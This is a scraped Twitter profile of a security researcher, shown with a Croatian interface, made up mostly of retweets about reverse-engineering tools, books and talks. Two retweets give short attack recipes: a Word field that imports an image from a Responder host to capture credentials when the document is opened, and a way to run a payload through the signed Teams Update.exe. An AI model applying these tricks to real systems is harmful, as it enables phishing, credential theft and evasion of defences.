rtmcx

@rtmcx

Member of the Synack Red Team. Researcher, pentester, shellcoder and reverse engineer. OSCE|OSCP|SLAE|eCPPT|CISSP.

Vrijeme pridruživanja: kolovoz 2013.

Tweetovi

Blokirali ste korisnika/cu @rtmcx

Jeste li sigurni da želite vidjeti te tweetove? Time nećete deblokirati korisnika/cu @rtmcx

  1. Prikvačeni tweet
    10. kol 2018.

    The feeling when you're at a Defcon workshop about ARM exploitation, and the teacher shows your shellcode (taken from exploit-db, and stripped of the author comments) and takes credit for it himself.. 😦 😠

    Poništi
  2. proslijedio/la je Tweet
    18. sij
    Poništi
  3. proslijedio/la je Tweet
    20. stu 2019.
    Poništi
  4. proslijedio/la je Tweet
    3. sij
    Poništi
  5. proslijedio/la je Tweet
    20. pro 2019.

    Cutter v1.10 now has a DEBUGGER! 🐞🥳 After a lot of work, we are so happy to announce that we finally implemented your most requested feature. The beta version of the debugger is available NOW on our website >> List of features and what's coming next >>

    Prikaži ovu nit
    Poništi
  6. proslijedio/la je Tweet
    16. ruj 2019.

    Super excited to finally release SVD-Loader for Ghidra: A tool to make bare-metal ARM firmware reverse-engineering much easier by automatically annotating all peripherals - for over 650 different microcontrollers!

    Prikaži ovu nit
    Poništi
  7. proslijedio/la je Tweet
    6. ruj 2019.

    We just released Cutter v1.9 on with a HUGE surprise - a full integration of Ghidra decompiler in Cutter! 🥳 Download v1.9 with the Decompiler from For more info, keep reading >>

    Prikaži ovu nit
    Poništi
  8. proslijedio/la je Tweet
    30. kol 2019.

    Facebook scans system libraries from their Android app user’s phone in the background and uploads them to their server This is called "Global Library Collector" at Facebook, known as "GLC" in app’s code It periodically uploads metadata of system libraries to the server

    Prikaži ovu nit
    Poništi
  9. proslijedio/la je Tweet
    13. kol 2019.

    Submitted this to MSRC, won't patch, it's a "feature"; Open Word -> CTRL + F9 -> IMPORT "\\\\Responder-IP\\1.jpg" -> right click and select "Edit Field" -> tick "Data not stored in document" -> save & close. Open the document -> free credentials :) Happy phishing!

    Poništi
  10. proslijedio/la je Tweet
    10. kol 2019.

    Paged Out! #1 is out! (and it's free to download!) There are 57 articles in 12 categories: Electronics Programming Assembly Reverse Engineering Sec/Hack Retro File Formats Algorithmics SysAdmin Radio Phreaking OS Internals Enjoy! !

    Prikaži ovu nit
    Poništi
  11. proslijedio/la je Tweet
    4. kol 2019.

    We are going to learn basic game hacking on Windows with Cheat Engine and Ghidra.

    Prikaži ovu nit
    Poništi
  12. proslijedio/la je Tweet
    10. srp 2019.

    : A realtime, multi-arch assembler and disassembler for shellcoding.

    Poništi
  13. proslijedio/la je Tweet
    26. lip 2019.

    Copy your payload into %userprofile%\AppData\Local\Microsoft\Teams\current\ Then %userprofile%\AppData\Local\Microsoft\Teams\Update.exe --processStart payload.exe --process-start-args "whatever args" Trusted signed binary will run the payload for you 😊

    Poništi
  14. proslijedio/la je Tweet
    28. lip 2019.

    We created a list of community plugins and scripts for Cutter 😎 From malware analysis to code coverage visualizers. Check it out @ We invite you to write more plugins for Cutter following our documentation:

    Poništi
  15. proslijedio/la je Tweet
    21. lip 2019.

    For all the people reading 's book, you can also use VirtualBox pretty easy for kernel debugging, follow these guidelines:

    Poništi
  16. proslijedio/la je Tweet
    21. lip 2019.

    My new blog post on Windows Application Debugging is up on #

    Poništi
  17. proslijedio/la je Tweet
    8. lip 2019.
    Odgovor korisniku/ci
    Poništi
  18. proslijedio/la je Tweet
    6. lip 2019.

    The book is now complete! Enjoy :)

    Poništi
  19. proslijedio/la je Tweet
    5. lip 2019.

    My talk from St. Petersburg 2019 is now live: using ETW... (I miscalculated the time, but all demos are in the GitHub repo)

    Poništi
  20. proslijedio/la je Tweet
    26. svi 2019.

    The complete chapter 10 is published!

    Poništi
  21. proslijedio/la je Tweet
    25. svi 2019.

    After being offline for quite a while on social media, got a good amount of time to get my shit straight. Me and have moved out of scriptdotsh & will be posting all the blogs on hence forth.

    Poništi

Čini se da učitavanje traje već neko vrijeme.

Twitter je možda preopterećen ili ima kratkotrajnih poteškoća u radu. Pokušajte ponovno ili potražite dodatne informacije u odjeljku Status Twittera.

    Možda bi vam se svidjelo i ovo:

    ·